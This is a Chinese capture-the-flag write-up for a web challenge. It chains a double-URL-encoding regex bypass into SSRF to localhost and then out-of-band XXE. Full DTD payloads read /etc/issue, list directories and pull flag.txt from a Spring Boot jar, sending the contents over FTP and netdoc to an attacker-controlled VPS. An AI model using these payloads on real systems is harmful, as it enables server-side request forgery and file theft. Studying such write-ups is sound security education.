第一题 至暗时刻
题目描述:
一道Web题,访问链接:
http://121.36.145.157:8088/
利用技术绕过限制,获得flag.txt文件中的值。
访问页面,是一张图片,查看页面源代码:
1 2 3 4 5 6 7 8 9 10 | <html>
<head>
<meta charset = "UTF-8" >
<title>test< / title>
< / head>
<body>
<img src = "/getimage?url=https://bbs.pediy.com/upload/attach/202009/236762_Y76C73KQC7MG83G.jpg" >
<! - - 测试加载配置文件 / loadConfig?url = x.xml - - >
< / body>
< / html>
|
发现一个被注释掉的url:
1 | http: / / 121.36 . 145.157 : 8088 / loadConfig?url = x.xml
|
看样子貌似可以访问指定的url
但访问页面返回not allow ip
,IP不被允许:
尝试 X-Forwarded-For
伪造客户端IP
抓包到burp中,爆破了一些内网ip都显示not allow ip
:
仅192.168端就有60000多个ip,显然也不会是爆破去做-_-|
回顾前面的网页源码发现另一个用来加载图片的链接:
1 | http: / / 121.36 . 145.157 : 8088 / getimage?url = https: / / bbs.pediy.com / upload / attach / 202009 / 236762_Y76C73KQC7MG83G .jpg
|
是访问指定的url获取资源的,尝试修改url参数,返回如下的正则表达式:
1 | illegal url! ^(http|https):\\ / \\ / [^?
|
应该是要想办法绕过这个正则,访问指定的url
这个正则要求url是如下格式:
1 2 3 | http: / / { 1 }.pediy.com / { 2 }
或
https: / / { 1 }.pediy.com / { 2 }
|
{1}处不允许出现'?','#','/'字符
{2}处可以是任意内容
直接用'#'无法通过正则:
尝试进行URL编码,还是不能通过正则:
换其它符号试试,发现在做正则检查前会进行一次URL解码:
尝试进行两次URL编码绕过:
绕过成功,已经尝试去访问 https://127.0.0.1
了
在自己的vps起了web服务,用这个ssrf去访问,企图获得真实IP,然后用这个IP去利用第一个接口:
这里注意到,我的web是起在5000端口的,但直接输 http://ip:port
的形式会报错 invalid port number
所以':'也要两次URL编码,访问成功,但是在我的vps获得的IP是 121.36.145.157
:
这不就是题目地这么,拿去 /loadConfig?url=x.xml
那里尝试,依然是 not allow ip
,行不通
又尝试ssrf http://127.0.0.1:8088/loadConfig?url=x.xml
这个url,构造请求:
1 | http: / / 121.36 . 145.157 : 8088 / getimage?url = http: / / 127.0 . 0.1 % 253a8088 % 2523.pediy .com / loadConfig?url = x.xml
|
返回结果,访问成功:
发到burp中继续尝试:
发现会从 /loadConfig?url=x.xml
指定的位置读取文件并当作XML来解析,猜测XXE漏洞
在自己的vps上放了以下payload:
1 2 3 4 5 6 7 8 9 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - t.dtd - - >
<?xml version = "1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/issue" >
]>
<r>&sp;< / r>
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
|
构造请求:
1 | / getimage?url = http: / / 127.0 . 0.1 % 253a8088 % 2523.pediy .com / loadConfig?url = http: / / {my_vps_ip}: 5000 / t.dtd
|
没有正常回显内容,尝试用FTP协议把内容发送出来,payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - c.dtd - - >
<?xml version = "1.0" ?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/issue" >
<!ENTITY % sp SYSTEM "http://my_vps_ip:5000/d.dtd" >
% sp;
% param3;
% exfil;
]>
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - d.dtd - - >
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://my_vps_ip:30000/%data3;'>" >
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
|
并在vps的30000端口上起了ftp服务,脚本:https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
构造请求:
1 | / getimage?url = http: / / 127.0 . 0.1 % 253a8088 % 2523.pediy .com / loadConfig?url = http: / / my_vps_ip: 5000 / c.dtd
|
在vps上接收到内容 /etc/issue
文件的内容:
但是尝试读含有特殊字符的文件时,就无法正常发送数据到vps:
而且没法查看目录,没办法找flag
之后又用netdoc协议试试,可以列目录,使用以下payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - g.dtd - - >
<?xml version = "1.0" encoding = "utf-8" ?>
<!DOCTYPE creds [
<!ENTITY % data3 SYSTEM "netdoc:///" >
<!ENTITY % sp SYSTEM "http://my_vps_ip:5000/d.dtd" >
% sp;
% param3;
% exfil;n
]>
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - d.dtd - - >
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'netdoc://my_vps_ip:80/%data3;'>" >
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
|
构造请求:
1 | / getimage?url = http: / / 127.0 . 0.1 % 253a8088 % 2523.pediy .com / loadConfig?url = http: / / my_vps_ip: 5000 / g.dtd
|
在burp中可以回显,已经可以列目录,读文件了:
之后就是列目录,看文件。。。
在/home下有一些jar包:
用jar:file:读jar包,尝试了spring jar包常见的路径
最后找到flag.txt的路径是 vip-demo-0.0.1-SNAPSHOT.jar
包下的 /BOOT-INF/classes/flag.txt
,payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - g.dtd - - >
<?xml version = "1.0" encoding = "utf-8" ?>
<!DOCTYPE creds [
<!ENTITY % data3 SYSTEM "jar:file:///home/vip-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/classes/flag.txt" >
<!ENTITY % sp SYSTEM "http://{my_vps_ip}:5000/d.dtd" >
% sp;
% param3;
% exfil;n
]>
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
<! - - d.dtd - - >
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'netdoc://101.37.76.66:80/%data3;'>" >
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
|
获得flag截图:
获得的flag是 flag{congratulations-Path-the-spring-boot}
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界